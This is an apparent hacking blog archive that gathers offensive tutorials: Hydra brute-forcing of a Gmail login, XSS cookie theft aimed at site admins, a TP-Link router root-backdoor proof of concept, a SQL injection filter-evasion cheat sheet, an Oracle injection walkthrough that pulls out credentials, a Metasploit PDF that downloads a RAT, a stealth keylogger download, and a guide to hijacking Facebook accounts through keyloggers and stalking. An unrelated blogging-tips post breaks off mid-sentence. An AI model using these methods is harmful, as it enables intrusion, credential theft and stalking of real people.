December 2013 ~|~ Free Game

How to do Hydra (Brute force Attack) to hack any E-mail Password

Brute-force attack

A password attack that does not attempt to decrypt any information, but continue to try different passwords. For example, a brute-force attack may have a dictionary of all words or a listing of commonly used passwords. To gain access to an account using a brute-force attack, a program tries all available words it has to gain access to the account. Another type of brute-force attack is a program that runs through all letters or letters and numbers until it gets a match.

Although a brute-force attack may be able to gain access to an account eventually, these attacks can take several hours, minutes or Hour to run. The amount of time it takes to complete these attacks is dependent on how complicated the password is and how well the attacker knows the target.

To help prevent brute-force attacks many systems will only allow a user to make a mistake in entering their username or password three or four times. If the user exceeds these attempts, the system will either lock them out of the system or prevent any future attempts for a set amount of time.

# So here we are going to use Backtrack 5, Hydra Attack. I will use fake G-mail a/c for this tutorial.

# Requirements.
* Backtrack 4 or 5 with Internet connection
* Password.txt file (That contains Possible passwords)
* Brain !!

# For Eg. I took fake ID of G-mail (hackerseven5@gmail.com) as my victim
it's password is '521478963', and Suppose i know the possibilities of
password so, I will make password.txt file to do brute force attack !! like
this >>>>>>>>

# Now it's time to start attack !! using Hydra gtk,
Go to>Application>Backtrack>Privilege Escalation>Password Attacks>Online Attacks>hydra-gtk.

# And it will start like this >>>>>>

# Fill all info in this way !!
* Single Target = smtp.gmail.com
* Port = 465
* Protocol = smtp
* mark = Use SSl, Be Verbose, Show Attempts

# As shown in this Image >>>>>>>>

# After setting your Target, go on Password tab >>

# Fill all info in this way !!
* Username = G-mail ID (hackerseven5@gmail.com)
* Password list = upload your possibilites password file
(save your password.txt file on desktop)

# After all go to > Start Tab and Clik on Start !!

# So, your Brute Force Attack has been started !!

# After all it will try Brute force attack using every password and try to login
with possibilities password, if you were lucky !! then it will show successful message like this >>>>>

>>>>>>>>>>>>>>>>>Viv EK<<<<<<<<<<<<<<<<<<<
I no using this attack it is very hard to hack any G-mail Password, but it can help you to recover your hacked ID or forget password.

Many of us try to hack sites every day and most of time we fail.
But there are some peoples with great talent to hack any site and we thought " GOD ... I want to be like him"
This happens to all of us ... right ?
But the thing which irritates us most is when a PRO hacker can not hack a site and same site is hacked by a new hacker who has just started learning hacking , and we thought " how the hell he did it ? "
This is my friend where you hack the PRO by being noob.

Here we will discuss a very small mistakes site admins make which leads to site deface ...

1) Many of us may familiar with SQL Injection and lot of time we inject the site and get admin pass , but we can not go further as we don't have admin panel location , here are some ways to find admin panel

a) First of all check if robots.txt file exists and if yes then see if admin link if there . If you can not find any admin related folder / file then open every file / folder admin has put to disallow . Cause there must be something in it what admin want to hide from us

b) If robots.txt method do not work then crawl the site. sometimes admin puts images or uploads in admin folder it self and from it we can get admin folder

c) In third try use some admin finder tools . Use havij or admin finder pro or something else which can brute force admin folder / file names . This not work all time but worth a shot .

d) Some times admin is really smart and he blocks every possible ways to find admin link. But still he makes mistakes. There is a golden rule in security that " NEVER SET SAME PASSWORD FOR TWO LOGINS " , but most admins ignore this. What he does that he keeps the same password in his admin panels add same password in cpanel. So check if Cpanel is there and if it's there try admin password there. Also if you find some email address from site then try that password too on his email. who know if password work and from his mails you got root passwords if site is a hosting site , it has worked for me many times.

e) If site is vulnerable to SQL injection and admin is not using standard CMS like wordpress or joomla then also try sql login bypasses like 'OR' '=' , 'OR 1=1 so on ... Also try some common passwords like admin : admin , password , 123456 , 12345678 , pass123 , password123 , root , toor , r00t , t00r , nimda (reverse of admin)

2) Many admins secures their sites for most of major attacks but forgets to patch low impact vulnerabilities .

a) Many admin do not put custom error page and keep default application error message . It is not some critical mistake but application error message can disclose if apache is there , if frontpage is there , versions etc.

b) Many admin also takes directory listing lightly. Some times it also leads to information leak. So when ever you get dir listing open then see every file in it , who know you find more then what you were searching.

c) Some small site admins do not consider XSS seriously. They underestimate power off XSS. What you do , if you find xss in his site then just create a simple mail to admin saying you have found XSS here. Admins will surly open that link directly and his cookie will be sent to you from that XSS. Also XSS is so much developed now that there are tools like Xssexploit , xsstunel from which you can hijack computers who visit exploited link. Who know if you can mail xssexploited link to admin saying you find porn on his site in this link and he will surely open that link and you get his computer ;)

d) Some misconfiguration leads to locale path disclose and admin think what a hacker can do with my local path? But my dear friend .. a hacker can do anything with any information. There is a command in SQL called into outfile from which you can directly shell the site from sql injection . here is the video explaining how

http://www.youtube.com/watch?v=9T28FC6cny8

TP-Link TL-WDR4300 is a popular dual band WiFi, SOHO class router.

Tested Firmware

We tested the remote root PoC on the newest firmware (published on 25.12.2012):

TL-WDR4300 – tested firmware version

The following info is provided for educational use only! We are also not resposible for any potential damages of the devices which are tested for this vulnerability.

Proof of Concept

root@secu:~# nc 192.168.0.1 2222
(UNKNOWN) [192.168.0.1] 2222 (?) : Connection refused
root@secu:~# wget http://192.168.0.1/userRpmNatDebugRpm26525557/start_art.html --2013-03-09 23:22:31-- http://192.168.0.1/userRpmNatDebugRpm26525557/start_art .html
Connecting to 192.168.0.1:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: "start_art.html"

[ <=> ] 426 --.-K/s in 0s

2013-03-09 23:22:33 (49.1 MB/s) - "start_art.html" saved [426]

root@secu:~# nc 192.168.0.1 2222
ps
PID Uid VmSize Stat Command
1 root 404 S init
2 root SW< [kthreadd]
3 root SW< [ksoftirqd/0]
4 root SW< [events/0]
5 root SW< [khelper]
6 root SW< [async/mgr]
7 root SW< [kblockd/0]
8 root SW [pdflush]
9 root SW [pdflush]
10 root SW< [kswapd0]
17 root SW< [mtdblockd]
18 root SW< [unlzma/0]
71 root 2768 S /usr/bin/httpd
76 root 380 S /sbin/getty ttyS0 115200
78 root 208 S ipcserver
82 root 2768 S /usr/bin/httpd
83 root 2768 S /usr/bin/httpd
86 root 732 S ushare -d -x -f /tmp/ushare.conf
92 root 348 S syslogd -C -l 7
96 root 292 S klogd
101 root SW< [napt_ct_scan]
246 root 348 S /sbin/udhcpc -h TL-WDR4300 -i eth0.2 -p /tmp/wr841n/u
247 root 204 S /sbin/udhcpc -h TL-WDR4300 -i eth0.2 -p /tmp/wr841n/u
251 root 364 S /usr/sbin/udhcpd /tmp/wr841n/udhcpd.conf
286 root 2768 S /usr/bin/httpd
299 root 2768 S /usr/bin/httpd
300 root 2768 S /usr/bin/httpd
305 root 2768 S /usr/bin/httpd
307 root 2768 S /usr/bin/httpd
309 root 2768 S /usr/bin/httpd
310 root 2768 S /usr/bin/httpd
389 root 2768 S /usr/bin/httpd

Details

After the following HTTP request is sent:

http://192.168.0.1/userRpmNatDebugRpm26525557/start_art.html

The router downloads a file (nart.out) from the host which has issed the http request and executes is as root:

PoC – diagram

Sample captures from the host which issues the http request:

Wireshark filter used to show router tftp traffic

wireshark1-400x103

nart.out tftp request

Models affected

TL-WDR4300
TL-WR743ND (v1.2 v2.0)
…

History of the bug

12.02.2013 – TP-Link e-mailed with details – no response
22.02.2013 – TP-Link again e-mailed with details – no response
12.03.2013 – public disclosure

Phrozen Keylogger Lite is finally available, developed by Dark comet RAT developer. Phrozen Keylogger Lite is a powerful and user friendly keylogger especially created for Microsoft Windows systems. Phrozen Keylogger Lite is compatible with all currently supported versions of Windows, which effectively means Windows XP to the recently released Windows 8.

Phrozen Keylogger Lite has been especially created to capture all keystrokes from any type of keyboard (PS/2, USB and even Virtual Keyboards). The captured keystrokes are stored into a local database. There they are sorted by their process name and the active window into a log. Phrozen Keylogger Lite is running silently in background. When the program is successfully installed on a computer, it will capture all keystrokes fully stealthily and the program will remain hidden from every user. It will not slow down the computer it is installed on.

If you want to consult the logs of the current day or previous days just press the so-called “Magic Shortcut” and enter your personal password and the logs will be made visible in a new window. You can easily manage, export, delete, mark as important, mail, etc. these logs. Phrozen Keylogger Lite also gives you the possibility to manage black listed words. When such a word is entered via keystrokes you will immediately be sent a mail which contains the entire context in which that ‘black listed word’ appears. This is a very useful feature: suppose you have forbidden your son to go to a specific gambling site and he does go there against your wishes, you then immediately get a mail that warns you of this transgression.

Download Phrozen Keylogger Lite v1.0

Here is a beautiful Tut From my dear friend H4x4rwOw on DNS HIJACKING
Recommended to download and watch
Download Here
Note:- Only for Educational purpose

Main GUI

Scan information about Personal User

Scan information about Fan Page

Auto detect input is User or Fan Page

Facebook Information <version 1.0>
Home page: http://junookyo.blogspot.com/

About:
+ Facebook Information is a simple tool for check information about anyone.

Features:
+ You just need to enter your username and press Check (Example username: juno_okyo or full URL: http://www.facebook.com/junookyo).
+ Automatically detects the input is Personal user or Fan Page.
+ Scan information from the Facebook Graph server.
+ If you want to export information, press Ctrl+S to save.

The software is distributed under the terms of the GNU General Public
License version 2 or later.

Download:

Click here to download!

SHA1 Checksum: 0695f7db598585df88a62ac769d5cda2529ef6be

Thanks for using!

Coded by Juno_okyo.

1) Blog frequently
Most new bloggers dislike hearing this. Trust me when I say that the struggle for content is ongoing. New bloggers, however, feel like it’s just happening to them. The truth is, don’t get a blog just to have a blog. Get it and keep it updated. It’s the quickest way to gaining traffic. How often should you blog? Three times a week. The best days to blog? Studies have shown that Tuesday, Wednesday, and Thursday are key days for blogging.

2) Stay on point
I tell authors this a lot: stay on point, stay on topic. Why? Because if you don’t you’ll lose readership. Once someone commits to your blog they want to keep reading relevant information. So don’t blog one day about your book, your speaking, or your mission and the next day share Aunt Ethel’s pot roast recipe.

3) Plan your blogs
While spontaneity is the catalyst for creativity, planning is a good way to stay on track. Start to map out key dates that you want to blog about that have some relation to your topic – this way when you’re at a loss for topics, you can always pick one from your list of planned out blogs. Also, consider these topics to blog about:
a) Future predictions: everyone loves these, to the degree that you can predict market trends in your industry do it, and the readership will follow.
b) Discuss industry news: what’s happening in your industry that you can talk about? Even if you’re a fiction writer there’s always *something* going on worth mentioning in publishing, writing, or marketing that directly relates to your topic.
c) The elephant in the room: talk about the stuff that everyone is afraid of. What new trends are emerging that consumers/readers/companies need to be aware of? What’s next for your market and how will it affect the industry? How can we keep publishing books when we already publish 800 a day? You see what I mean? Think of things that frighten you and talk about them. People will respond. Every time I do this I get a ton of comments on my b

WappeX aka Web Application Exploiter is a Multi Vulnerability Scanning + Exploiting tool .
It contains all Hacking tool / Exploiting Tool for pentesting the Website via SQL Injection.

Team Has added the Havij also , one of the most Used Hacking tool .
Wappex is Completely a Package of Hacking tool.

Features of Wappex v2.0 :-

An exploit database covering a wide range of vulnerabilities.
A set of tools useful for penetration testing:
- Manual Request
- Dork Finder
- Exploit Editor
- Hidden File Checker
- Neighbor Site Finder
- Find Login Page
- Online Hash Cracker
- Encoder/Decoder
Execute multiple instances of one or more exploits simultaneously.
Execute multiple instances of one or more payloads (for every running exploit) simultaneously.
Test a list of target URL’s against a number of selected exploits.
Allows you to create your own exploits and payloads and share them online.
A number of featured exploits (6) and payloads (39) bundled within the software
exploit database:
- Testing and exploiting of Local File Inclusion vulnerabilities
- Testing and exploiting of Local File Disclosure vulnerabilities
- Testing and exploiting of Remote File Inclusion vulnerabilities
- Testing and exploiting of SQL Injection vulnerabilities
- Testing and exploiting of Remote Command Execution Inclusion vulnerabilities
- Testing and exploiting of Server-side Code Injection vulnerabilities

HOW TO DOWNLOAD ?

SQLi filter evasion cheat sheet (MySQL)
Basic filter

Comments
'Or 1 = 1 #
'Or 1 = 1 -
'Or 1 = 1 / * (MySQL <5.1)
'Or 1 = 1;
'Or 1 = 1 union select 1.2 as `
'Or # newline
1 = '1
'Or--newline
1 = '1
'/ *! 50000or * / 1 = '1
'/ *! Hay * / 1 = '1

Prefixes
+ - ~!
'Or - +2 = -!!! '2

Operators
^, =,! =,%, /, *, &, &&, | |, | |,, >>, <=, <=,,, XOR, DIV, LIKE, SOUNDS LIKE, RLIKE, REGEXP, Least, Greatest , CAST, CONVERT, IS, IN, NOT, MATCH, AND, OR, BINARY, BETWEEN, ISNULL

Whitespaces
% 20% 09% 0a% 0B% 0c% 0d% a0 / ** /
'Or + (1) sounds / ** / like "1" -% a0-
'Union (select (1), tabe_name, (3) from `information_s Chema`. `Tables`) #

Strings with quotes
SELECT 'a'
SELECT "a"
SELECT n'a '
SELECT b'1100001 '
SELECT _binary'1100001 '
SELECT x'61 '

Strings without quotes
'Abc' = 0 × 616263

Aliases
select pass as alias from users
select pass aliasalias from users
select pass `alias alias` from users

Typecasting
'Or true = '1 # or 1 = 1
'Or round (pi (), 1) + true + true = version () # or 3.1 +1 +1 = 5.1
'Or '1 # or true

Compare operator typecasting
select * from users where 'a' = 'b' = 'c'
select * from users where ('a' = 'b') = 'c'
select * from users where (false) = 'c'
select * from users where (0) = 'c'
select * from users where (0) = 0
select * from users where true
select * from users

Authentication bypass '='
select * from users where name = "="
select * from users where false = "
select * from users where 0 = 0
select * from users where true
select * from users

Authentication bypass '-'
select * from users where name = "-"
select * from users where name = 0-0
select * from users where 0 = 0
select * from users where true
select * from users
Function filter

General function filtering
ascii (97)
LOAD_FILE / * foo * / (0 × 616 263)

Strings with functions
'Abc' = unhex (616 263)
'Abc' = char (97,98,99)
hex ('a') = 61
ascii ('a') = 97
ord ('a') = 97
'ABC' = concat (conv (10,10,36), conv (11,10,36), conv (12,10,36))

Strings Extracted from gadgets
collation (\ N) / / binary
collation (user ()) / / utf8_general_ci
@ @ Time_format / /% H:% i:% s
@ @ Binlog_format / / MIXED
@ @ Version_comment / / MySQL Community Server (GPL)
dayname (from_days (401)) / / Monday
dayname (from_days (403)) / / Wednesday
monthname (from_days (690)) / / November
monthname (from_unixtime (1)) / / January
collation (convert ((1) using / ** / koi8r)) / / koi8r_general_ci
(Select (collation_name) from (information_schema.col lations) where (id) = 2) / / latin2_czech_cs

Special characters Extracted from gadgets
AES_ENCRYPT (1.12) / / 4CH ± {? "^ c × HeEEa
DES_ENCRYPT (1,2) / /, / iOk
@ @ Ft_boolean_syntax / / + -> <() ~ *: "" & |
@ @ DATE_FORMAT / /% Y-% m-% d
@ @ Innodb_log_group_home_dir / /. \

Integer representations
false: 0
true: 1
true + true: 2
floor (pi ()): 3
ceil (pi ()): 4
floor (version ()): 5
ceil (version ()): 6
ceil (pi () + pi ()): 7
floor (version () + pi ()): 8
floor (pi () * pi ()): 9
ceil (pi () * pi ()): 10
concat (true, true): 11
ceil (pi () * pi ()) + true: 11
ceil (pi () pi () + version ()): 12
floor (pi () * pi () + pi ()): 13
ceil (pi () * pi () + pi ()): 14
ceil (pi () * pi () + version ()): 15
floor (pi () * version ()): 16
ceil (pi () * version ()): 17
ceil (pi () * version ()) + true: 18
floor ((pi () + pi ()) * pi ()): 19
ceil ((pi () + pi ()) * pi ()): 20
ceil (ceil (pi ()) * version ()): 21
concat (true + true, true): 21
ceil (pi () * ceil (pi () + pi ())): 22
ceil ((pi () + ceil (pi ())) * pi ()): 23
ceil (pi ()) * ceil (version ()): 24
floor (pi () * (version () + pi ())): 25
floor (version () * version ()): 26
ceil (version () * version ()): 27
ceil (pi () * pi () * pi () pi ()): 28
floor (pi () * pi () * floor (pi ())): 29
ceil (pi () * pi () * floor (pi ())): 30
concat (floor (pi ()), false): 30
floor (pi () * pi () * pi ()): 31
ceil (pi () * pi () * pi ()): 32
ceil (pi () * pi () * pi ()) + true: 33
ceil (pow (pi () pi ())-pi ()): 34
ceil (pi () * pi () * pi () + pi ()): 35
floor (pow (pi () pi ())): 36

@ @ New: 0
@ @ Log_bin: 1

! Pi (): 0
!! Pi (): 1
true-~ true: 3
log (-cos (pi ())): 0
-Cos (pi ()): 1
coercibility (user ()): 3
coercibility (now ()): 4

minute (now ())
hour (now ())
(NOW ())
week (now ())
month (now ())
year (now ())
quarter (now ())
year (@ @ timestamp)
CRC32 (true)

Extract substrings
substr ('abc', 1,1) = 'a'
substr ('abc' from 1 for 1) = 'a'
substring ('abc', 1,1) = 'a'
substring ('abc' from 1 for 1) = 'a'
mid ('abc', 1,1) = 'a'
mid ('abc' from 1 for 1) = 'a'
lpad ('abc', 1, space (1)) = 'a'
RPAD ('abc', 1, space (1)) = 'a'
left ('abc', 1) = 'a'
reverse (right (reverse ('abc'), 1)) = 'a'
insert (insert ('abc', 1,0, space (0)), 2,222, space (0)) = 'a'
space (0) = trim (version () from (version ()))

Search substrings
locate ('a', 'abc')
position ('a', 'abc')
position ('a' IN 'abc')
INSTR ('abc', 'a')
SUBSTRING_INDEX ('ab', 'b', 1)

Cut substrings
length (trim (leading 'a' FROM 'abc'))
length (replace ('abc', 'a', "))

Compare strings
strcmp ('a', 'a')
mod ('a', 'a')
find_in_set ('a', 'a')
field ('a', 'a')
count (concat ('a', 'a'))

String length
length ()
bit_length ()
char_length ()
octet_length ()
bit_count ()

String case
ucase
LCase
lower
upper
password ('a')! = password ('A')
OLD_PASSWORD ('a')! = OLD_PASSWORD ('A')
md5 ('a')! = md5 ('A')
sha ('a')! = sha ('A')
AES_ENCRYPT ('a')! = AES_ENCRYPT ('A')
DES_ENCRYPT ('a')! = DES_ENCRYPT ('A')
Keyword filter

Connected keyword filtering
(0) union (select (table_name), column_name, ...
0 / ** / union / *! 50000select * / table_name `foo` / ** / ...
0% a0union% a0select% 09group_concat (table_name) ....
0'union all select all `table_name` foo from `information_schema`. `Tables`

OR, AND
'| | 1 = '1
'&& 1 = '1
'='
'-'

OR, AND, UNION
'And (select pass from users limit 1) =' secret

OR, AND, UNION, LIMIT
'And (select pass from users where id = 1) =' a

OR, AND, UNION, LIMIT, WHERE
'And (select pass from users group by id having id = 1) =' a

OR, AND, UNION, LIMIT, WHERE, GROUP
'And length ((select pass from users having substr (pass, 1,1) =' a '))

OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING
'And (select substr (group_concat (pass), 1,1) from users) =' a
'And substr ((select max (pass) from users), 1,1) =' a
'And substr ((select max (replace (pass,' lastpw ', ")) from users), 1,1) =' a

OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING, SELECT
'And substr (LOAD_FILE (' file '), locate (' DocumentRoo t ', (LOAD_FILE (' file '))) + length (the' ot DocumentRo '), 10) =' a
'= "Into outfile' / var / www / dump.txt

OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING, SELECT, FILE
'Procedure Analyse () #
'-If (name =' Admin ', 1,0) #
'-If (if (name =' Admin ', 1,0), if (substr (pass, 1,1) = a', 1,0), 0) #

Control flow
case 'a' when 'a' then 1 [else 0] end
case when 'a' = 'a' then 1 [else 0] end
if ('a' = 'a', 1.0)
IFNULL (NULLIF ('a', 'a'), 1)

Enjoy..
PROTOTYPE...

58543-acunetix_web_vulnerability_scanner

Blocking Automated Scanners Against Your Website.

Credits: Cyberb0y.

We all know that there has been a vast development in automated vulnerability scanners. There are countless private , public , free commercial automated web vulnerability scanners. And since they are available all over the internet so it has become a easy thing for anyone to find out vulnerability in your website by running automated scanner against your website. And that results in problems for the webmasters. Even if the vulnerability is not detected but it affects the website as any automated scanner send numerous request to the website in order to conduct the vulnerability scan. And thereby the website gets affected in terms of the bandwidth or if any vulnerability is found it might get exploited. So better make an arrangement before to stop people using automated scanners on your website.

This can be done by just adding few code to your .htaccess file on your server.
THE CODE IS AS FOLLOWS ===>>>

RewriteEngine On
< IfModule mod_rewrite.c
>
RewriteCond
%{HTTP_USER_AGENT}
^w3af.sourceforge.net
[NC,OR]
RewriteCond
%{HTTP_USER_AGENT}
dirbuster [NC,OR]
RewriteCond
%{HTTP_USER_AGENT}
nikto [NC,OR]
RewriteCond
%{HTTP_USER_AGENT} SF
[OR]
RewriteCond
%{HTTP_USER_AGENT}
sqlmap [NC,OR]
RewriteCond
%{HTTP_USER_AGENT}
fimap [NC,OR]
RewriteCond
%{HTTP_USER_AGENT}
nessus [NC,OR]
RewriteCond
%{HTTP_USER_AGENT}
whatweb [NC,OR]
RewriteCond
%{HTTP_USER_AGENT}
Openvas [NC,OR]
RewriteCond
%{HTTP_USER_AGENT}
jbrofuzz [NC,OR]
RewriteCond
%{HTTP_USER_AGENT}
libwhisker [NC,OR]
RewriteCond
%{HTTP_USER_AGENT}
webshag [NC,OR]
RewriteCond
%{HTTP:Acunetix-Product}
^WVS
RewriteRule ^.*
[URL]http://127.0.0.1/[/URL] [R=301,L]
< /IfModule >

As we all use RAT, Botnets but the things went wrong when our rats and bots get detected by antiviruses. But today i am gonna show you how to backdoor a pdf ebook.
Yes a pdf ebook.

Concept behind this--->
Victim will open our pdf file but in background it will download our rat and bot silently and will infect the victim.

Things you need----->
1. A pdf book (use any book)
2. Metasploit(use backtrack OS)
3. Your Rat or bot hosted at any file sharing site(Make sure you use direct link like www.filesharing.com/server.exe)

Now Lets start this---->
1. Open up Metasploit console

2. Type this in the console:

3. Type this in the console:

4. Type this in console:

EXAMPLE: set INFILENAME /root/mypdf.pdf

5. Type this in console:

EXAMPLE: set url http://download.com/server.exe

6. Type this in console:

Now you will get infected pdf in root folder just send ur pdf file to victim and when he open the pdf file he/she will able to read pdf but in background pdf file will download our rat and bot in victim computer.

Note:
1. Use direct link for your rat.
2. Use a good pdf file so as victim try to open it.

source:hackthevilblog

The script consist of 10 Most used Tools by Hackers and Pentesters
2 Private scripts , 1 - Subdomain scanner , 2- Ftp Brute forcer.

it is release 1 , In next list , it will contain up 5 private scripts diff from this.
in Final , it will have all Private scripts plus my own coded scripts :)

Download:

https://www.dropbox.com/s/aq3toi7graxcv6r/Amaterasu.tar.gz

Oracle SQL Injection Tutorial.
Hello and welcome to a Oracle SQL injection tutorial. First you need to know that injecting into to Oracle databases is not much different then injecting into others. The only differences are the syntax and different filenames etc... Ok, if you know a site the is vulnerable to some sort of SQLi but, you don't know what database it is, try the following code to check for a Oracle DB.

Code:

https://somesite.com/calender.asp?day=7%...CT%20NULL%
20from%20dual--

If it is a Oracle DB you should get a error like:

Code:

[Oracle][ODBC][Ora]ORA-01789: query block has incorrect number of result
columns

Now to find the amount of columns in the DB you will keep adding NULL data until you no longer receive and error.

Code:

https://somesite.com/calender.asp?day=7%...NULL,NULL%
20from%20dual--

Now that you have the number of columns you can proceed to extract data from the DB. In this guide I will only show how to extract the account info but, other info can be extracted as well.

Now we try to find which column uses "string" data type. To do this we replace the first "NULL" with 'a'. If you receive an error replace the 'a' with Null and try the next "NULL". An example of this is:

Code:

https://somesite.com/calender.asp?day=7%...,'a',NULL%
20from%20dual--

Once you find the columns that use string data types you can start to search for the names of the tables containing useful info. To do this we use the "user_objects" table.We also use the "object_name" and "object_type" table names to show what the names and types of tables are that are specified as user data (Credentials). A example of the following would be like so:

Code:

https://somesite.com/calender.asp?day=7%...CT%20NULL,
object_name,object_type,NULL%20from%20user_objects--

As you can see, we use the columns that use string data to show object_name and object_type.

Tip: You can also use the all_user_objects table instead of user_objects. This will show all info seen by the user even if the user does not owned it.

We should now see many different table names and types. If you don't, and you get and error, try removing NULL values and finding the columns that use string data type.

In my example lets just say we found a table called USERS. We will attempt to find the names of the column inside this table by using the user_tab_columns table like so:

Code:

https://somesite.com/calender.asp?day=7%...CT%20NULL,
column_name,NULL,NULL%20from%20user_tab_columns%20where%20table_name%20%
3d%20Â’USERSÂ’--

Note: %3d is a URL encoded = and %20 is a URL encode whitespace (spacebar).

Now lets say we get login, password, and priviledge columns. We can query these by using the following code:

Code:

https://somesite.com/calender.asp?day=7%...CT%20NULL,
login,password,priviledge%20from%20users--

You should get the login username, password, and priviledge level!

Tip: If there is only one column that uses string data type then you can concatenate multiple columns like so:

Code:

https://somesite.com/calender.asp?day=7%...CT%20NULL,
login||Â’:Â’||password||Â’:Â’||priviledge,NULL,NULL%20from%20user_objects--

This is just like the concat command in MySQL.

Tip: If you want to perfect your oracle injection knowledge I recommend getting some e-books on oracle and installing oracle on your localhost. This way you can practice on your DB.

1. You will need to download Firefox or Opera (of you choose Opera skip to number 5)

2. Open up Firefox, and go to the tool bar.. open Tools>Addons, and then go to get addons, and search: Firebug.

3. Install Firebug, and then restart Firefox.

4. Firebug should be at the bottom right corner of your browser. Now just go to the small blog and/or website of your choice.

5. Post a blog... but not just any blog.. the crash blog! What you're going to do, is... right click on the submit button, and scroll down to inspect element (click it), then you are going to find the element that says maxchar and change it, and the value to whatever the hell you want! My suggestion is that you hold down the 9 button for like 10 minutes.

6. once the maxchar has been changed... find as many of the biggest web pages on the internet, select all copy and paste them into your blog, over and over and over again.. my suggestion is that you wikipedia search cheese, and copy and paste that over and over.

7. Submit, and watch the website crash!

This can be said as a thick tut giant REA 517 pages, including 25 113 crack soft crackme tuts and tuts. This lag is built according to the table of contents for convenient reference and reference. The article meticulously, clearly defining point in looking to conduct and analyze crack the code so that Asm Keygen conducted in a particular programming language.

DOWNLOAD LINK - CLICK HERE

paid-facebook-messages-detour-privacy-settings.si

Ever since I had been problems constantly having to deal with facebook leaving me out off people's accounts I began to think that I should write over my experiences to help others.

I will go over specific techniques and ideas to eventually grant you entrance to their accounts without having to deal with that Facebook problem having logging in from different location.

1st. Before you even begin reading this, you must already have their passwords or e-mails. If not, I will tell you a few ideas of how to acquire them.

If you only want to log in without changing passwords, I would suggest that you steal their passwords through Phishing, keylogging, or RATing.

2nd. Bypassing Facebook security can be done through black hat methods, however I will not go over those methods, instead I will be touching the social engineering methods which are more effective and you can get faster results.

3rd. You will need to use your brain to think and have patience. If you don't have either a brain to think or the patience to wait, please don't continue reading this tutorial because you will not get any success.

Ok, let's move on to the actual information.

-This method is a cheap shot method, but you never know if it might work or not.

#1. If a person uses a particular computer to log in to their accounts on a regular basis, THAT computer alone should be your focus.

You should infect that computer with a keylogger and have it linked together with a FTP to send you the logs or linked to send you e-mails.

#2. Another method is to use your OWN computer to acquire the password by infecting yourself with a keylogger and let the victim use your computer. Gain their trust to the point of where they can log in to different websites.

You can say for instance "My account is not working, I think Facebook banned me. Can you test your account to see if yours is working?"

And of course, they will log in and you will gain the information. After they successfully log in, you can login to your account and say "Oh, there we go! It worked"

Now, you will attempt to log in in the future and the problem of Logging in from another location will dissapear.

#3. Let's say that they aren't stupid enough to use your computer to log in, you might think, what then? Well, here's my next suggestion to you.

Considering that you will already have the password through the methods I mentioned earlier, but you will have the problem of Logging in from another location.

Here's what you do:

Watch and study your victim, if you know he/she uses a location to use a computer, you should attempt to log in at that same location as well. It could be school, library, another friend's house, etc...

Most people will use any computer to log in to Social Networks or E-mails to check on updates. Considering that the IP you log in at that particular is the same within their network, the problem of Logging in from another location will not come up.

#4. So, you don't have the choice of either offering your computer as a trap or the chance to "stalk" your victim. You wonder, what do I do then?

Well, this is where it gets more tricky considering that Facebook finally came up with an ingenious method to avoid intruders of taking over accounts easily.

Here's what Facebook did, in case if you don't already know. Facebook implemented a feature where you must visually recognize the friends on that account. They will show you pictures of random people within that account and ask you to select the name of that person.

If you don't recognize any of those people, you're screwed.

When will this happen? That will only happen when you attempt to change their passwords, so Facebook makes sure that you do in fact own that account. I personally wouldn't attempt to change the passwords, but if you do try, here's what I would recommend to you.

-If you know the person in person, notice who he/she is friends with to try to recognize the faces and physically ask the other persons their names.

-If you do not know the person, you can use websites like:
http://com.lullar.com/
http://www.pipl.com/email/

To search their names, e-mails, phone numbers to see whether if you can find them on other Social networks. You can search the person's name manually by going to Myspace, Facebook, etc...To see who they have added as friends.

Your next step will be to add a friend of the victim or the victim directly. Adding the victim directly would probably be the best plan because you would have access directly to all the victims' friends and their pictures.

Now, all you have to do is match the pictures that Facebook asks you when you attempt to change their passwords by going to the victims friends and match them.

If you don't want to change their passwords, you can mask the victim's IP using other methods in which I will not go over. To find out their IP, you will need a RAT to manually whois them or any other method other there to find their IP.

A quick method I will suggest to you is to send the victim an e-mail if they have a hotmail account. When they reply you can right click on the e-mail and view source. You will see an IP from sender and use that to mask.

Mask their IP and facebook will not give you the problem of Logging in from another location.

If you follow the suggestions I have given you, you will surely gain entrance to their accounts and Facebook won't be able to do crap.

Their security is strong, but good ol' Social engineering never fails. Thumbsup

Enjoy.

Game Crack

Featured Post Title 1

Tricks

Hacking

SEO

Summing up all the tools for hacking

How to do Hydra (Brute force Attack) to hack any E-mail Password

Secrets of Hacking ~ The Basics

TP-Link HTTP/TFTP Backdoor

Phrozen Keylogger Lite v1.0 download

DNS HIJACKING

[J2TeaM] Facebook Information v1.0

Main GUI

Scan information about Personal User

Scan information about Fan Page

Auto detect input is User or Fan Page

Get Most Traffic to your Blog

WappeX v 2.0 Cracked - Full Version

Master Sql Cheet With Waf sheets

Blocking Automated Scanners Against Your Website

Backdooring a pdf ebook with metasploit

Project Amaterasu Release 1

Oracle SQL Injection Tutorial

Crash a small website with Firebug

[eBook] The REA-books cRaCkErTeAm Tutorials

Bypass Facebook Security Jacking Method

Mengenai Saya

Followers

Arsip Blog

Total Tayangan Laman

Label

Label

Label

Label